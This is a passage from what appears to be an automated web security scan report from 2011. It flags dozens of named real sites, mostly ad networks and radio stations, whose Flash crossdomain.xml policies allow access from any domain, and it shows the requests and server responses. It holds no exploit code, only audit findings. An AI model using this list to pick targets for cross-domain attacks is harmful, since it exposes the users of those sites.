Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:41:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.26. http://idpix.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.27. http://img0.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img0.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img0.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.28. http://img1.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img1.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.29. http://img2.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img2.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img2.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.30. http://img3.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img3.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.yardbarker.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.35
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 17:09:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.31. http://k.collective-media.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: k.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Tue, 03 May 2011 15:43:26 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:26 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.32. http://l.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=3b0d6cc6-668f-408f-ac11-62b6873f6bd1; path=/; expires=Thu, 02 May 2013 15:41:39 GMT
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

7.33. http://leeenterprises.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: leeenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:48 GMT
Server: Omniture DC/2.0.0
xserver: www148
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.34. http://m1.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m1.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1328237060
Date: Tue, 03 May 2011 15:41:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.35. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:41:30 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 03 May 2011 15:41:30 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.36. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 03 May 2011 15:41:40 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.37. http://r1-ads.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 15:40:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 03 May 2011 15:40:48 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.38. http://rs.gwallet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Set-Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTEzIDg4ODg=;expires=Tue, 02-Feb-2016 18:09:42 GMT;path=/;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

7.39. http://servedby.flashtalking.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:38 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
content-type: application/xml
Age: 19597
Via: 1.0 dfw175165010000 (MII-APC/1.6)
Content-Length: 540
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.40. http://spe.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Fri, 06 May 2011 05:28:12 GMT
Date: Tue, 03 May 2011 15:42:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.41. http://speed.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:43:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.42. http://stat.flashtalking.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stat.flashtalking.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stat.flashtalking.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0580c1d81e1acfe994df99be827cb0c3:1279561426"
Last-Modified: Mon, 19 Jul 2010 17:43:46 GMT
Accept-Ranges: bytes
Content-Length: 253
Content-Type: application/xml
Date: Tue, 03 May 2011 15:42:19 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.43. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:41:32 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "c60178-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

7.44. http://turn.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 03 May 2011 15:41:40 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.45. http://www.610wtvn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.610wtvn.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3147906582
X-Cache-Server: varnish04
Expires: Tue, 03 May 2011 11:40:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.46. http://www.971zht.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.971zht.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.971zht.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3145994292
X-Cache-Server: varnish04
Expires: Tue, 03 May 2011 10:26:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:26:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.47. http://www.977music.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.977music.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.977music.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:52:39 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Mon, 01 Jun 2009 15:21:26 GMT
ETag: "655a5a3-66-fac7e980"
Accept-Ranges: bytes
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.48. http://www.air1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.air1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.air1.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 15 Sep 2005 16:45:14 GMT
Accept-Ranges: bytes
ETag: "ccdd83d814bac51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:15:27 GMT
Connection: close
Content-Length: 208

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.49. http://www.am570radio.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.am570radio.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3147376792
X-Cache-Server: varnish04
Expires: Tue, 03 May 2011 11:24:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.50. http://www.artvoice.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.artvoice.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.artvoice.com

Response

HTTP/1.0 200 OK
Server: Zope/(Zope 2.11.7-final, python 2.4.6, darwin) ZServer/1.1
Date: Tue, 03 May 2011 10:17:19 GMT
Content-Length: 311
Content-Type: text/xml; charset=utf-8
X-Cache: MISS from artvoice.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.51. http://www.axill.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.axill.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.axill.com

Response

HTTP/1.1 200 OK
Content-Length: 251
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 11:29:48 GMT
Accept-Ranges: bytes
ETag: "21365938185cb1:177e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:23:08 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.google.com"/>
<allow-access-from domain="*"/>
<allow-access-from domain="http://84.45.63.195/"/>
...[SNIP]...

7.52. http://www.big1059.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.big1059.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.big1059.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3146758107
X-Cache-Server: varnish04
Expires: Tue, 03 May 2011 11:02:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:02:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.53. http://www.bikersingle.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bikersingle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bikersingle.com

Response

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/xml
Last-Modified: Mon, 13 Oct 2008 13:08:13 GMT
Accept-Ranges: bytes
ETag: "2d22eebf342dc91:521"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:31:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-reques
...[SNIP]...

7.54. http://www.boydgaming.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boydgaming.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boydgaming.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Mar 2011 19:07:22 GMT
ETag: "15f4631-84c-70444e80"
Accept-Ranges: bytes
Content-Length: 2124
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="boydstatic.purplehp.com" />
<allow-access-from domain="bconnected.purplehp.com" />
...[SNIP]...
<allow-access-from domain="www.bconnectedonline.com" />
<allow-access-from domain="www.coastcasinos.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="promotions.boydgaming.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ninja2.boydvacationshawaii.com" />
<allow-access-from domain="www.boydvactionshawaii.com" />
<allow-access-from domain="www.itsvegasbaby.com" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.55. http://www.branditz.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.branditz.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.branditz.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:59 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 03 Jun 2010 17:30:11 GMT
ETag: "2ef8b7a-95-488238efcaec0"
Accept-Ranges: bytes
Content-Length: 149
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.56. http://www.broadbandsports.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.broadbandsports.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.broadbandsports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:34 GMT
Server: Apache/2.2.3 (Fedora)
X-Powered-By: PHP/5.1.6
Content-Length: 200
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.57. http://www.builderonline.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.builderonline.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.builderonline.com

Response

HTTP/1.0 200 OK
Content-Length: 131
Content-Type: text/xml
Last-Modified: Wed, 23 Feb 2011 02:00:24 GMT
Accept-Ranges: bytes
ETag: "f5231e6ffdd2cb1:13c2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR CURa PSAi PSDi OUR IND UNI COM NAV DEM"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:09:22 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.58. http://www.buildlastingsuccess.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.buildlastingsuccess.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buildlastingsuccess.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=f50b9976c64de0c4e5a464a81ce27532; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.59. http://www.cariboucoffee.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cariboucoffee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cariboucoffee.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 03 May 2011 11:06:09 GMT
ETag: W/"167-1287680074000"
Last-Modified: Thu, 21 Oct 2010 16:54:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=7288C84BBEFD28F3EBDFD74A1534E0FE; Path=/
Set-Cookie: VLTALT=33103666#www.cariboucoffee.com; Domain=.cariboucoffee.com; Path=/
Set-Cookie: AWSELB=3389D795106F522A5402DFE94ED1A41D942AD83E855F403772983386633666AC11C2C8DF3A5AAD00F461F9F8B68F0AA47750EC5730D02A560FAAE2DD85221B66A1E48EE116FA2233DA2B90E86C8D7E24BEFFFAFB7C;PATH=/
Content-Length: 167
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.60. http://www.carpictures.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.carpictures.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.carpictures.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:56 GMT
Server: Apache
Last-Modified: Tue, 01 Apr 2008 03:42:44 GMT
ETag: "14e0003-de-449c78fa33500"
Accept-Ranges: bytes
Content-Length: 222
Cache-Control: max-age=604800, public
Expires: Tue, 10 May 2011 10:33:56 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

...[SNIP]...

7.61. http://www.cayenne.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cayenne.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cayenne.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 20 Jul 2010 17:35:01 GMT
ETag: "fe8d2d-148-48bd51ad05b40"
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
